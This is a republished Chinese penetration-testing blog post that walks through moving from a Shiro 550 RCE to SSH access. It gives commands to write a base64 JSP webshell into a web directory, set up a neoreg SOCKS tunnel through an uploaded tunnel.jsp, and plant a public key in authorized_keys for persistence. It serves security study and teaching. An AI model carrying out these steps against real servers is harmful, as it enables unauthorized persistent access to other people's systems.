|
0x01 前言
在渗透测试中,拿到 webshell 后执行命令总会碰到很多不便,而使用 ssh 登录则会方便许多。
相比使用 webshell 工具执行命令,ssh 连接可以有命令提示、路径补全、支持二次交互等优势,本文记录一个从 WEB RCE 漏洞到 SSH 登录的姿势。
0x02 过程
Getshell
首先通过 Shiro 550 得到一个 shell
因为网站不出网,所以不能直接反弹 shell,通过 base64 写入 webshell 到 web 目录
echo <base64 webshell> |base64 -d > webapps/uploadImg/shell.jsp;ls -lah
架设代理
首次使用,先生成自己密码的 neoreg 服务端代码
python3 neoreg.py generate -k <your-password>
执行后在 neoreg_servers
找到对应服务端语言的文件,这里是 tunnel.jsp
,然后通过上面的 shell 上传到目标服务器 web 目录上,再通过 neoreg 连接
python3 neoreg.py -k <your-password> -u https://xxx.com/uploadImg/tunnel.jsp --skip -l 0.0.0.0 -p 30080
# -k 指定连接密码,就是生成时用的密码
# -u tunnel.jsp 的url
# --skip 忽略https证书错误
# -l 本地socks服务监听ip
# -p 本地socks服务监听端口
写入 ssh 公钥
这里使用xshell生成秘钥,默认选项生成就可以了,shell会自动保存秘钥对,当然使用ssh-keygen也是可以的
然后把生成的公钥文件,复制到目标主机的 ~/.ssh/authorized_keys
文件中,如果不存在可以创建
连接 ssh
127.0.0.2
配置用户名及公钥连接,公钥选择前面生成那个
配置代理,使用上面 neoreg 构建的代理
成功连接 ssh
为什么连接 127.0.0.2
172.xx.xx.33
连接不上,而连接 127.0.0.1
时则提示主机指纹改变的问题,需要重新写入指纹到目标主机才能连接,然而非 root 用户无法写入,连接 127.0.0.2
则完美避开问题文章来源:r0yanx博客
原文地址:https://r0yanx.com/2021/11/04/渗透测试从RCE到SSH登录/
关 注 有 礼

推 荐 阅 读
原文始发于微信公众号(潇湘信安):实战 | 渗透测试从RCE到SSH登录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论